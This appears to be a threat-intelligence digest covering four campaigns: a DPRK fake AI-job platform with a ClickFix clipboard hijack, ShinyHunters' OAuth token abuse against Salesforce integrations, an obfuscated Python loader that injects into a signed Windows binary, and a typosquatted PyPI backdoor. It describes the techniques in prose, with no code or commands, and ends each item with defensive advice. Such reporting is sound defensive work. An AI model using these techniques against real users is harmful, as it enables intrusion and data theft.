Update: DPRK Expands Contagious Interview Operation With Full Fake Job Platform Targeting U.S. AI Talent
Researchers have uncovered a highly polished fake recruitment platform built as part of a new variant of the DPRK-linked Contagious Interview operation. Unlike earlier lures that relied on simple login pages, this version uses a complete React and Next.js job board filled with fabricated listings impersonating companies in the AI, crypto, and Web3 sectors. The site mimics legitimate hiring workflows, offering realistic job descriptions, resume upload features, and synthetic branding that resembles modern AI tooling ecosystems. This extensive credibility layer is meant to keep applicants engaged long enough to funnel them into the malware-delivery stage while simultaneously harvesting resumes, personal details, and professional links valuable to DPRK intelligence efforts. The malicious payload is delivered through a weaponized “Video Introduction” step that triggers a ClickFix-style clipboard hijack. When applicants attempt to follow troubleshooting instructions, their clipboard contents are silently overwritten with a multi-stage command sequence that downloads a fake driver update, retrieves secondary components from the attacker's infrastructure, and executes a VBScript loader for persistence and follow-on activity. This design reflects a maturation of DPRK tradecraft by blending malware delivery into workflows that mirror standard remote hiring practices for technical roles. The choice to impersonate AI labs and cryptocurrency companies aligns with DPRK collection priorities, offering potential access to privileged developer environments, model artifacts, crypto systems, and sensitive research. Defenders and job seekers are advised to verify that career portals are hosted on official domains and to avoid executing any code or commands supplied by untrusted external hiring platforms.
Update: ShinyHunters Target Gainsight–Salesforce Integrations Through OAuth Token Abuse
Salesforce has disclosed that it detected unusual activity involving Gainsight-published applications, prompting the company to revoke all associated OAuth access and refresh tokens and remove the apps from its marketplace while the investigation continues. Early analysis indicates that threat actors obtained and abused third-party OAuth tokens, allowing them to impersonate the trusted Gainsight integration and access certain customers’ Salesforce data through the app’s external connection. Researchers from Google’s threat intelligence team assess the activity as part of a broader campaign linked to ShinyHunters, echoing similar incidents earlier this year that targeted other SaaS connectors. Gainsight, HubSpot, and Zendesk have temporarily limited or disabled related integrations out of caution while forensic reviews proceed. Salesforce’s investigation shows the activity stemmed from compromised third-party OAuth tokens used by Gainsight-published applications, enabling threat actors to act as the trusted integration and access customer data without interacting with Salesforce user accounts directly. This aligns with assessments from Google’s threat intelligence team that ShinyHunters is conducting a coordinated campaign against SaaS ecosystems by harvesting and abusing OAuth tokens from multiple vendors, including earlier incidents involving Salesloft Drift. Gainsight, HubSpot, and Zendesk have all taken precautionary steps by disabling or delisting affected connectors while forensic reviews continue. The incident illustrates the systemic risk posed by long-lived SaaS integrations, where token compromise bypasses MFA, circumvents login telemetry, and enables cross-platform data access. As a result, administrators are being urged to immediately audit connected apps, revoke stale or high-risk tokens, and rotate credentials tied to any Gainsight-related integrations.
Python-Based Loader Uses Heavy Obfuscation and Process Injection to Deliver [.]NET RAT
Researchers at K7 Labs analyzed a multi-stage Python-based malware loader that uses layered obfuscation and disguised archives to evade detection while delivering a stealthy remote-access payload. The infection chain begins with a PE dropper that decrypts and reconstructs a batch script, which then downloads a file disguised as a PNG but actually containing a RAR archive. The extracted components include a fake sys file containing a password-protected archive, a legitimate WinRAR binary to extract it, and a Python runtime impersonating a Windows system file. After execution, the runtime begins a sequence of Base64, BZ2, Zlib, and marshal-based unpacking that reconstructs a large filler-packed blob containing a small marshalled .pyc file responsible for the actual malicious behavior. Once executed, the Python payload is injected into the signed Windows binary cvtres[.]exe, allowing the malware to operate under the guise of a trusted process. The injected process loads a .NET component from the attacker's infrastructure and establishes an encrypted, bidirectional C2 channel that enables remote command execution, file transfer, and persistent control. The combination of multi-layer obfuscation, archive masquerading, Python runtime bundling, and trusted-process injection reflects a growing trend in loader design aimed at bypassing traditional detection mechanisms. Defenders should rely on behavioral monitoring and process-inspection capabilities to detect anomalous activity in otherwise legitimate Windows binaries.
Malicious PyPI Package Embeds Multi-Layer Encrypted Backdoor
Researchers have identified a malicious PyPI package named “spellcheckers” that impersonates the legitimate “pyspellchecker” library and embeds a multi-stage encrypted backdoor. The package executes hidden Base64-encoded code during import, contacts an attacker-controlled C2 server, and retrieves a second-stage payload that deploys a Python-based remote access trojan. This backdoor uses layered XOR encryption, custom protocol formatting, silent exception handling, and dynamic code execution to maintain persistent access while avoiding static and behavioral detection. The operation also overlaps with earlier social engineering campaigns in which attackers posed as recruiters to target users’ cryptocurrency information, indicating a broadened focus on supply-chain compromises affecting Python developers. The second stage maintains a continuous polling loop with the C2 server, decrypts incoming commands, and executes attacker-supplied Python code through exec(), providing full remote control over infected systems. The malware reports host details such as operating system and hostname, and suppresses all errors to remain silent during execution. By distributing this package via PyPI, the attackers achieved broader reach and leveraged developers’ trust in common dependencies, compromising nearly 1,000 systems before removal. Defenders should monitor for unexpected Base64 decoding and exec() behavior in imported modules, inspect PyPI dependencies for hidden index files, and enforce allowlists or isolated build environments to reduce exposure to tampered packages.
